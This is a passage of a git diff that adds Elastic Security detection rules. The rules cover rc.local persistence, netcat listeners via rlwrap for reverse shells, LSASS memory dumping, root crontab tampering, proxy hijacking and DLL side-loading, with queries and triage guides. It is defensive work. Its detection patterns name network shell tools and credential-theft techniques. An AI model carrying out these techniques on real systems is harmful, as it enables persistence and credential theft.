rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the \"systemd-rc-local-generator\", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through Run Control Detected", + "new_terms_fields": [ + "host.id", + "process.executable", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution.\n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital.\n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type : \"linux\" and event.category : \"file\" and\nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\n \"dockerd\" or \"docker\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"dpkg\"\n) and not file.extension : (\"swp\" or \"swpx\")\n", + "references": [ + "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", + "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#8-boot-or-logon-initialization-scripts-rc-scripts", + "https://www.cyberciti.biz/faq/how-to-enable-rc-local-shell-script-on-systemd-while-booting-linux-system/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0f4d35e4-925e-4959-ab24-911be207ee6f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 110 + }, + "id": "0f4d35e4-925e-4959-ab24-911be207ee6f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_3.json b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_3.json new file mode 100644 index 00000000000..58e90a8de18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_3.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell.", + "false_positives": [ + "Netcat is a dual-use tool that can be used for benign or malicious activity. Netcat is included in some Linux distributions so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Netcat Listener Established via rlwrap", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"rlwrap\" and process.args in (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\") and\nprocess.args : \"*l*\" and process.args_count >= 4\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0f56369f-eb3d-459c-a00b-87c2bf7bdfc5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_208.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_208.json new file mode 100644 index 00000000000..36f30708c2c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_208.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to an LSASS handle via PssCaptureSnapShot where two successive process accesses are performed by the same process and target two different instances of LSASS. This may indicate an attempt to evade detection and dump LSASS memory for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential LSASS Memory Dump via PssCaptureSnapShot", + "query": "event.category:process and host.os.type:windows and event.code:10 and\n winlog.event_data.TargetImage:(\"C:\\\\Windows\\\\system32\\\\lsass.exe\" or\n \"c:\\\\Windows\\\\system32\\\\lsass.exe\" or\n \"c:\\\\Windows\\\\System32\\\\lsass.exe\")\n", + "references": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/sbousseaden/status/1280619931516747777?lang=en" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0f93cb9a-1931-48c2-8cd0-f173fd3e5283", + "setup": "## Setup\n\nThis is meant to run only on datasources using Elastic Agent 7.14+ since versions prior to that will be missing the threshold\nrule cardinality feature.\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "winlog.event_data.TargetProcessId", + "value": 2 + } + ], + "field": [ + "process.entity_id" + ], + "value": 2 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 208 + }, + "id": "0f93cb9a-1931-48c2-8cd0-f173fd3e5283_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_106.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_106.json new file mode 100644 index 00000000000..af3ea01d4d2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_106.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the root crontab file. Adversaries may overwrite this file to gain code execution with root privileges by exploiting privileged file write or move related vulnerabilities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Privilege Escalation via Root Crontab File Modification", + "query": "event.category:file and host.os.type:macos and not event.type:deletion and\n file.path:/private/var/at/tabs/root and not process.executable:/usr/bin/crontab\n", + "references": [ + "https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc", + "https://www.exploit-db.com/exploits/42146" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0ff84c42-873d-41a2-a4ed-08d74d352d01", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "0ff84c42-873d-41a2-a4ed-08d74d352d01_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_106.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_106.json new file mode 100644 index 00000000000..3e3f667b91f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_106.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the built-in networksetup command to configure webproxy settings. This may indicate an attempt to hijack web browser traffic for credential access via traffic sniffing or redirection.", + "false_positives": [ + "Legitimate WebProxy Settings Modification" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "WebProxy Settings Modification", + "query": "event.category:process and host.os.type:macos and event.type:start and\n process.name : networksetup and process.args : ((\"-setwebproxy\" or \"-setsecurewebproxy\" or \"-setautoproxyurl\") and not (Bluetooth or off)) and\n not process.parent.executable : (\"/Library/PrivilegedHelperTools/com.80pct.FreedomHelper\" or\n \"/Applications/Fiddler Everywhere.app/Contents/Resources/app/out/WebServer/Fiddler.WebUi\" or\n \"/usr/libexec/xpcproxy\")\n", + "references": [ + "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "https://objectivebythesea.com/v2/talks/OBTS_v2_Zohar.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "10a500bb-a28f-418e-ba29-ca4c8d1a9f2f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1539", + "name": "Steal Web Session Cookie", + "reference": "https://attack.mitre.org/techniques/T1539/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_109.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_109.json new file mode 100644 index 00000000000..b82cba039cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_109.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DLL Side-Loading via Trusted Microsoft Programs", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"WinWord.exe\", \"EXPLORER.EXE\", \"w3wp.exe\", \"DISM.EXE\") and\n not (process.name : (\"winword.exe\", \"explorer.exe\", \"w3wp.exe\", \"Dism.exe\") or\n process.executable : (\"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files?(x86)\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Windows\\\\System32\\\\Dism.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Dism.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_110.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_110.json new file mode 100644 index 00000000000..874b98dd3ba --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_110.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DLL Side-Loading via Trusted Microsoft Programs", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"WinWord.exe\", \"EXPLORER.EXE\", \"w3wp.exe\", \"DISM.EXE\") and\n not (process.name : (\"winword.exe\", \"explorer.exe\", \"w3wp.exe\", \"Dism.exe\") or\n process.executable : (\"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files?(x86)\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Windows\\\\System32\\\\Dism.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Dism.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer 